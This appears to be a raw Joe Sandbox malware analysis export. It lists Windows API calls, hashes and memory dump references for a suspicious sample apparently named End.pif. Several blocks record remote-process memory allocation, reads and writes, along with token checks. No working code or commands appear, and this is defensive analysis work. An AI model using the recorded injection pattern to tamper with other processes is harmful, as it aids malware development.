                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 764ff24227d8e5274e1a17d929d7222bc8271bf9818d71aff4050d88fd54dbfe
                                                                                                                                                                                                                                  • Instruction ID: 9d84c00d09571cf15b5f199260e1f274cd73a1bda6b2c981ef2c42a1f9360fd8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 764ff24227d8e5274e1a17d929d7222bc8271bf9818d71aff4050d88fd54dbfe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31018876E0A6157F332566BA9C8CF7F6A6DDEC6B61318013DFD05C6145DA608D0282B2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2931989736-0
                                                                                                                                                                                                                                  • Opcode ID: 2fdfb682980512742a695b77e81ad400911ff4677cd7e04bd499d6e8e9de8e65
                                                                                                                                                                                                                                  • Instruction ID: f37eea06dd5fd6d1df0ad3126449b9ff4bd61285fe5dece26b31d32b58cb7d57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fdfb682980512742a695b77e81ad400911ff4677cd7e04bd499d6e8e9de8e65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1401B5A160430D7BD61456229DA2FFB735DAE517A8F284821FE059B641EF61ED10C3A1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000000A,?,?,009BF64E,009B545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C3170
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C31A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C31CC
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C31D9
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009C31E2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: ea8db3bed817063b9e53675add5e86f99bd8c600f85d63cac68e2a9014f1dd42
                                                                                                                                                                                                                                  • Instruction ID: f21001ccd3eb7423c13c2b5795ad564cfb6c15412d0a7ab51a631cdd532d06d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea8db3bed817063b9e53675add5e86f99bd8c600f85d63cac68e2a9014f1dd42
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7301A972E48A006FA622A774DC89F6B156DABD53B1728C53CF81592192EF25CB034353
                                                                                                                                                                                                                                  APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?,?,009F0C4E), ref: 009F091B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0936
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0944
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?), ref: 009F0954
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0960
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: efade4d4e5b030e562eadaeba4cd9b12cc3219a8e7d3c4c1e1d2aa0f9069270c
• Instruction ID: a40b84b2be29ad48db5067badd9614765eb2ce8b3baaf4fe7fcba9510af4742f
• Opcode Fuzzy Hash: efade4d4e5b030e562eadaeba4cd9b12cc3219a8e7d3c4c1e1d2aa0f9069270c
• Instruction Fuzzy Hash: DE018472600208AFEB108FA9DC44BBA7BEDEB84795F140124FE05D6113E7B1DD829760
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
• GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: b6d92f11bb7e1b1492a81490dca56afde9d53d97cba0471a51749e616995fe81
• Instruction ID: 605ef56be3f0aa4c7d4a6a93533bceb0328fc1cd11880232b2651f10c26d22ec
• Opcode Fuzzy Hash: b6d92f11bb7e1b1492a81490dca56afde9d53d97cba0471a51749e616995fe81
• Instruction Fuzzy Hash: D80181B5601605FFDB218FA8DC49D7A3B6DEF84364F210424F945C7260DB31DC428A60
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009F1916
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009F1922
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009F1931
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009F1938
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009F194E
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 88f7fe36968d54021debaab0f712fda5e6581e71ef63801dfe44f11b275ed573
• Instruction ID: a478dd27052612e4c439d49d5af43653fed6b9252efb58d83387d243f822e6e9
• Opcode Fuzzy Hash: 88f7fe36968d54021debaab0f712fda5e6581e71ef63801dfe44f11b275ed573
• Instruction Fuzzy Hash: 09F06275100305ABDB214FA9EC4DF663BADEF897A0F100424FA45D7261CB70DC528BA0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009F1976
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009F1982
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009F1991
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009F1998
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009F19AE
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 39982ba48086881bd80b2f7ad17e3da9dd55f9ed3effe739baadfa78efc5e1c5
• Instruction ID: 45e12b2f876c4a9d2feaa3e438f1085c188fa1fe8b993fe696c11210832efdbf
• Opcode Fuzzy Hash: 39982ba48086881bd80b2f7ad17e3da9dd55f9ed3effe739baadfa78efc5e1c5
• Instruction Fuzzy Hash: D2F06275100305ABD7218FA9EC59F663B6DEF897A0F100524FA45C7261CB70D9928BA0
APIs
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CCB
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CD8
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CE5
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CF2
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00CFF
• CloseHandle.KERNEL32(?,?,?,?,00A00B24,?,00A03D41,?,00000001,009D3AF4,?), ref: 00A00D0C
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: e5a1802ce1056dd06e0b52e8077b37cea262a7d7a878dd86d766f8a6caed00b5
• Instruction ID: c636b606e597dcff53a034fe7b6e540f6b402b38263ceee1e6f9ec66b50caa0f
• Opcode Fuzzy Hash: e5a1802ce1056dd06e0b52e8077b37cea262a7d7a878dd86d766f8a6caed00b5
• Instruction Fuzzy Hash: 3801DC71800B099FCB30AFAAE880912FAF9BE603157108A3FD19252961C7B0A859CE80
APIs
• GetDlgItem.USER32(?,000003E9), ref: 009F65BF
• GetWindowTextW.USER32(00000000,?,00000100), ref: 009F65D6
• MessageBeep.USER32(00000000), ref: 009F65EE
• KillTimer.USER32(?,0000040A), ref: 009F660A
• EndDialog.USER32(?,00000001), ref: 009F6624
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                                                                                                  • Opcode ID: 674ae7ca1c15a11ddfdb92978cf239afb4280010cbc102a686ef0ca063b036a0
                                                                                                                                                                                                                                  • Instruction ID: 10d6e166ec3cbadc31f9cff95b4542779e41abed09f4b62b640337d45cd8a336
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 674ae7ca1c15a11ddfdb92978cf239afb4280010cbc102a686ef0ca063b036a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35016230510308ABEB309B54DD4EBB67BBCFB00705F000569B286A14E1DBE4AA46CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAD2
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAE4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDAF6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDB08
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDB1A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: f11c08c8ca9ee9ff4c5f4d7207a2f3f9b527a7c8b3477f9cac2484fa2b31d8fd
                                                                                                                                                                                                                                  • Instruction ID: cc25078100b9c6d3e3f29f00925d0cd7ed8f9d61966664fcf3eb566dd0dca30d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f11c08c8ca9ee9ff4c5f4d7207a2f3f9b527a7c8b3477f9cac2484fa2b31d8fd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F01D72D46305AB8624EBA8F982F1A77EDFE587117A50C1DF00AD7941CB30FCC08A66
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C262E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2640
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2653
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2664
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C2675
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 07793d17cca124813788a9a32ee60fae454e2117a99bc41f5d226befadcacf5a
                                                                                                                                                                                                                                  • Instruction ID: fd94356f4c663de7c36a472618e6abafc4e9a9e33e3dfc09a319392718d45554
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07793d17cca124813788a9a32ee60fae454e2117a99bc41f5d226befadcacf5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0DA70C416209B8612EFE8EC11F883B78FB68B51315094FF415D62B5CBB14983AF96
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __freea$_free
                                                                                                                                                                                                                                  • String ID: a/p$am/pm
                                                                                                                                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                  • Opcode ID: 009f6ca3012e8d297082b769fa9bfe4a395f57dace593d2d14c2fc3d38798f56
                                                                                                                                                                                                                                  • Instruction ID: 5fb900cb1fd8e951c9461b968a41bd8ed3e93fac390331cc5088af41bcd15a9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 009f6ca3012e8d297082b769fa9bfe4a395f57dace593d2d14c2fc3d38798f56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D10371D10246DBDB289F68C995FBAB7B9FF47300F28415EE4029B262D3358D40CB9A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F2B1D,?,?,00000034,00000800,?,00000034), ref: 009FBDF4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009F30AD
                                                                                                                                                                                                                                    • Part of subcall function 009FBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009F2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 009FBDBF
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 009FBD1C
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 009FBD2C
                                                                                                                                                                                                                                    • Part of subcall function 009FBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009F2AE1,00000034,?,?,00001004,00000000,00000000), ref: 009FBD42
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009F311A
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009F3167
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 3143ee15dd4091672258d9913b336e01a59c365fe0453774a28f1048ff8c1eff
• Instruction ID: d772f52e36e15c7ec8ce007843d19e83817a4446429590231f08b12a287ee896
• Opcode Fuzzy Hash: 3143ee15dd4091672258d9913b336e01a59c365fe0453774a28f1048ff8c1eff
• Instruction Fuzzy Hash: C2411BB2A0021CAEDB10DFA8CD45BEEBBB8EF45700F108095EA45B7181DB746E45CB61
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif,00000104), ref: 009C1AD9
• _free.LIBCMT ref: 009C1BA4
• _free.LIBCMT ref: 009C1BAE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
• API String ID: 2506810119-3675057497
• Opcode ID: 0617125778d83d063d2ba38b068bd27f35365a5597ea35ff7d46d4674316e177
• Instruction ID: c61f250d64246d6d013a77f6e6a989c88b143a4ed309a6c39e38cbe85b44dd6c
• Opcode Fuzzy Hash: 0617125778d83d063d2ba38b068bd27f35365a5597ea35ff7d46d4674316e177
• Instruction Fuzzy Hash: 10318671E40218AFDB21DF99DC81F9EBBFCEF85710B1041AAE40497256E6704E41CB96
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009FCBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 009FCBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A629C0,019B5780), ref: 009FCC40
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
